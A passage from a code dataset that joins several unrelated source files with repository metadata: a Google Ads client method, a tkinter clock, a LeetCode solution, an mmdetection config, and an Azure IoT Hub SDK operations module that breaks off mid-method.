operations (:class:`Sequence[google.ads.googleads.v5.services.types.KeywordPlanAdGroupOperation]`):
Required. The list of operations to
perform on individual Keyword Plan ad
groups.
This corresponds to the ``operations`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v5.services.types.MutateKeywordPlanAdGroupsResponse:
Response message for a Keyword Plan
ad group mutate.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([customer_id, operations]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest):
request = keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if customer_id is not None:
request.customer_id = customer_id
if operations is not None:
request.operations = operations
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.mutate_keyword_plan_ad_groups]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('customer_id', request.customer_id),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
__all__ = (
'KeywordPlanAdGroupServiceClient',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
9facb01edf8123187c2216673316c6136a0b5655 | 7a31235b60706896351c7e2fe8dbc47217023ddf | /Progress/digital_clock.py | 53e4089d6aa1583c0493b46a886ac67bd3351408 | [] | no_license | sailendrachettri/learning-tkinter | b947e9423654c63bc7b96eb58c03b8f8e0ba99e9 | e978eaa428b71168a16e2ba66c0c54089738a47e | refs/heads/main | 2023-05-27T14:32:06.419250 | 2021-06-11T08:53:27 | 2021-06-11T08:53:27 | 375,646,752 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | import time
from tkinter import *
from PIL import Image
from PIL.ImageTk import PhotoImage
root = Tk()
root.title('Digital Clock - Sailendra')
root.geometry("600x650")
root.configure(bg="#0075A2")
#A function for clock
def clock():
hour = time.strftime("%I")
minute = time.strftime("%M")
second = time.strftime("%S")
am_pm = time.strftime("%P")
clock_label.config(text=hour + ":" + minute + ":" + second + " " + am_pm)
clock_label.after(1000, clock) # it call clock function in every 1 seconds
#Background image
image = Image.open("img/digital_clock.png")
resized = image.resize((500, 500), Image.ANTIALIAS)
new_image = PhotoImage(resized)
image_label = Label(root, image=new_image, bg="#0075A2")
image_label.grid(row=0, column=0,pady=40, padx=(40, 0))
#Create label to display watch's text
clock_label = Label(root, text="10:20:20 Am", font="Helvetica 46 bold", bg='white', fg='red')
clock_label.grid(row=0, column=0, padx=(40, 0))
#Calling the function
clock()
root.mainloop()
| [
"sailendra9083@gmail.com"
] | sailendra9083@gmail.com |
19ea764231c1a94b224080d6bd26c7496422741d | 6b78bd7f62f7f407bf11d877cc4d91e7db3b62fe | /python/diamond_mine.py | 4669941ed0ebfebb735a8125bc0f2eb0f15142c5 | [] | no_license | PascalUlor/code-challenges | b85efacd4bc5999a0748d1fa1e84f503be09dc94 | 6488d0a6d2729bd50b106573f16488479fd6e264 | refs/heads/master | 2023-03-03T17:50:18.413127 | 2023-02-21T13:10:02 | 2023-02-21T13:10:02 | 212,979,719 | 1 | 0 | null | 2023-02-15T22:59:13 | 2019-10-05T10:14:29 | Python | UTF-8 | Python | false | false | 430 | py | """
1) Given a matrix of n*n. Each cell contain 0, 1, -1.
0 denotes there is no diamond but there is a path.
1 denotes there is diamond at that location with a path
-1 denotes that the path is blocked.
Now you have start from 0,0 and reach to last cell & then return back to 0,0 collecting maximum no of diamonds.
While going to last cell you can move only right and down.
While returning back you can move only left and up.
"""
| [
"pascalulor@yahoo.com"
] | pascalulor@yahoo.com |
4dff494aab4fd14ae50a55d20d20b9b04525c132 | d79a614759a818cffad595e1ad376e244b4550ed | /tests/unittest.py | db854e957be2c8ab2a8305e0b975fde48cde6063 | [
"BSD-3-Clause"
] | permissive | absszero/sublime-phpunit | 9577fc8c8b3b836a08847acf112038d0f5c59314 | 37f43378c3dae37cc88fa1910eea07da1ab4af9e | refs/heads/master | 2023-06-29T15:09:30.865548 | 2020-05-05T22:53:33 | 2020-05-05T22:53:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import os
from unittest import TestCase
from unittest import mock # noqa: F401
from unittest import skipIf # noqa: F401
from sublime import find_resources
from sublime import active_window
def fixtures_path(path=None):
if path is None:
return os.path.join(os.path.dirname(__file__), 'fixtures')
return os.path.join(os.path.dirname(__file__), 'fixtures', path)
class ViewTestCase(TestCase):
def setUp(self):
self.view = active_window().create_output_panel(
'phpunit_test_view',
unlisted=True
)
self.view.set_scratch(True)
self.view.settings().set('auto_indent', False)
self.view.settings().set('indent_to_bracket', False)
self.view.settings().set('tab_size', 4)
self.view.settings().set('trim_automatic_white_space', False)
self.view.settings().set('smart_indent', True)
self.view.settings().set('tab_size', 4)
self.view.settings().set('translate_tabs_to_spaces', True)
self.view.set_syntax_file(find_resources('PHP.sublime-syntax')[0])
def tearDown(self):
if self.view:
self.view.close()
def fixture(self, text):
self.view.run_command('phpunit_test_setup_fixture', {'text': text})
| [
"gerardroche@users.noreply.github.com"
] | gerardroche@users.noreply.github.com |
03188c1d306bc98d4c39a009acf8fc9d5177dad4 | ae12996324ff89489ded4c10163f7ff9919d080b | /LeetCodePython/SortTheStudentsByTheirKthScore.py | bd33fbc541d444dd7ce25c2e25b134d93734dc7f | [] | no_license | DeanHe/Practice | 31f1f2522f3e7a35dc57f6c1ae74487ad044e2df | 3230cda09ad345f71bb1537cb66124ec051de3a5 | refs/heads/master | 2023-07-05T20:31:33.033409 | 2023-07-01T18:02:32 | 2023-07-01T18:02:32 | 149,399,927 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,653 | py | """
There is a class with m students and n exams. You are given a 0-indexed m x n integer matrix score, where each row represents one student and score[i][j] denotes the score the ith student got in the jth exam. The matrix score contains distinct integers only.
You are also given an integer k. Sort the students (i.e., the rows of the matrix) by their scores in the kth (0-indexed) exam from the highest to the lowest.
Return the matrix after sorting it.
Example 1:
Input: score = [[10,6,9,1],[7,5,11,2],[4,8,3,15]], k = 2
Output: [[7,5,11,2],[10,6,9,1],[4,8,3,15]]
Explanation: In the above diagram, S denotes the student, while E denotes the exam.
- The student with index 1 scored 11 in exam 2, which is the highest score, so they got first place.
- The student with index 0 scored 9 in exam 2, which is the second highest score, so they got second place.
- The student with index 2 scored 3 in exam 2, which is the lowest score, so they got third place.
Example 2:
Input: score = [[3,4],[5,6]], k = 0
Output: [[5,6],[3,4]]
Explanation: In the above diagram, S denotes the student, while E denotes the exam.
- The student with index 1 scored 5 in exam 0, which is the highest score, so they got first place.
- The student with index 0 scored 3 in exam 0, which is the lowest score, so they got second place.
Constraints:
m == score.length
n == score[i].length
1 <= m, n <= 250
1 <= score[i][j] <= 10^5
score consists of distinct integers.
"""
from typing import List
class SortTheStudentsByTheirKthScore:
def sortTheStudents(self, score: List[List[int]], k: int) -> List[List[int]]:
return sorted(score, key=lambda row: -row[k]) | [
"tengda.he@gmail.com"
] | tengda.he@gmail.com |
aafb5f0e2b2913ca35de9883987f2df7decb0f56 | 278d7f4467a112416d1adfbcd3218033ff0fd9b3 | /configs/cascade_rpn/crpn_faster_rcnn_r50_caffe_fpn_1x_coco.py | 12fdc8c8a7be3f7a59a9424662c683ff88982a17 | [] | no_license | Young-1217/detection | e3d67938b454e955b5b7a82d5ae222e62f9545fb | 6760288dac92e00ddc3e813ed0e1363c1fa1ce2d | refs/heads/main | 2023-06-01T21:41:37.998947 | 2021-06-21T10:03:01 | 2021-06-21T10:03:01 | 371,868,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,533 | py | _base_ = '../faster_rcnn/faster_rcnn_r50_caffe_fpn_1x_coco.py'
rpn_weight = 0.7
model = dict(
rpn_head=dict(
_delete_=True,
type='CascadeRPNHead',
num_stages=2,
stages=[
dict(
type='StageCascadeRPNHead',
in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
scales=[8],
ratios=[1.0],
strides=[4, 8, 16, 32, 64]),
adapt_cfg=dict(type='dilation', dilation=3),
bridged_feature=True,
sampling=False,
with_cls=False,
reg_decoded_bbox=True,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=(.0, .0, .0, .0),
target_stds=(0.1, 0.1, 0.5, 0.5)),
loss_bbox=dict(
type='IoULoss', linear=True,
loss_weight=10.0 * rpn_weight)),
dict(
type='StageCascadeRPNHead',
in_channels=256,
feat_channels=256,
adapt_cfg=dict(type='offset'),
bridged_feature=False,
sampling=True,
with_cls=True,
reg_decoded_bbox=True,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=(.0, .0, .0, .0),
target_stds=(0.05, 0.05, 0.1, 0.1)),
loss_cls=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
loss_weight=1.0 * rpn_weight),
loss_bbox=dict(
type='IoULoss', linear=True,
loss_weight=10.0 * rpn_weight))
]),
roi_head=dict(
bbox_head=dict(
bbox_coder=dict(target_stds=[0.04, 0.04, 0.08, 0.08]),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.5),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))),
# model training and testing settings
train_cfg=dict(
rpn=[
dict(
assigner=dict(
type='RegionAssigner', center_ratio=0.2, ignore_ratio=0.5),
allowed_border=-1,
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.7,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
debug=False)
],
rpn_proposal=dict(max_num=300, nms_thr=0.8),
rcnn=dict(
assigner=dict(
pos_iou_thr=0.65, neg_iou_thr=0.65, min_pos_iou=0.65),
sampler=dict(type='RandomSampler', num=256))),
test_cfg=dict(
rpn=dict(max_num=300, nms_thr=0.8), rcnn=dict(score_thr=1e-3)))
optimizer_config = dict(
_delete_=True, grad_clip=dict(max_norm=35, norm_type=2))
| [
"noreply@github.com"
] | Young-1217.noreply@github.com |
be828be8e6b3ef5b3d0469a50a97f4c57b295f59 | aba00d6272765b71397cd3eba105fc79b3a346e0 | /Old_Python_projects/ITGK/øving10/sudoku.py | 11337b49d12f25436ebcbada686bb6db904a94e1 | [] | no_license | JosteinGj/School | a2c7cc090571b867637003fe6c647898ba9d8d24 | 3b5f29846e443b97f042241237dbda3208b20831 | refs/heads/master | 2023-05-02T11:07:29.517669 | 2021-04-26T09:04:57 | 2021-04-26T09:04:57 | 295,340,194 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | def make_board(filename):
file=open(filename)
board=file.readlines()
output=[]
for i in board:
row=i.split(",")
output.append(row)
return output
print(make_board("test.txt")) | [
"jostein.gj@gmail.com"
] | jostein.gj@gmail.com |
b59095cc433c622fc7c3b98d5c0af88910171240 | d7016f69993570a1c55974582cda899ff70907ec | /sdk/iothub/azure-mgmt-iothub/azure/mgmt/iothub/v2022_04_30_preview/aio/operations/_private_endpoint_connections_operations.py | 886ffd50f96903141ddcc4d811e963bfeec394e0 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 28,250 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union, cast, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._private_endpoint_connections_operations import (
build_delete_request,
build_get_request,
build_list_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.iothub.v2022_04_30_preview.aio.IotHubClient`'s
:attr:`private_endpoint_connections` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def list(
self, resource_group_name: str, resource_name: str, **kwargs: Any
) -> List[_models.PrivateEndpointConnection]:
"""List private endpoint connections.
List private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of PrivateEndpointConnection or the result of cls(response)
:rtype: list[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
cls: ClsType[List[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
request = build_list_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("[PrivateEndpointConnection]", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Get private endpoint connection.
Get private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _update_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> _models.PrivateEndpointConnection:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(private_endpoint_connection, (IO, bytes)):
_content = private_endpoint_connection
else:
_json = self._serialize.body(private_endpoint_connection, "PrivateEndpointConnection")
request = build_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 201:
response_headers["Azure-AsyncOperation"] = self._deserialize(
"str", response.headers.get("Azure-AsyncOperation")
)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: _models.PrivateEndpointConnection,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties. Is
either a PrivateEndpointConnection type or a IO type. Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
private_endpoint_connection=private_endpoint_connection,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _delete_initial(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> Optional[_models.PrivateEndpointConnection]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
cls: ClsType[Optional[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 202:
response_headers["Azure-AsyncOperation"] = self._deserialize(
"str", response.headers.get("Azure-AsyncOperation")
)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Delete private endpoint connection.
Delete private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
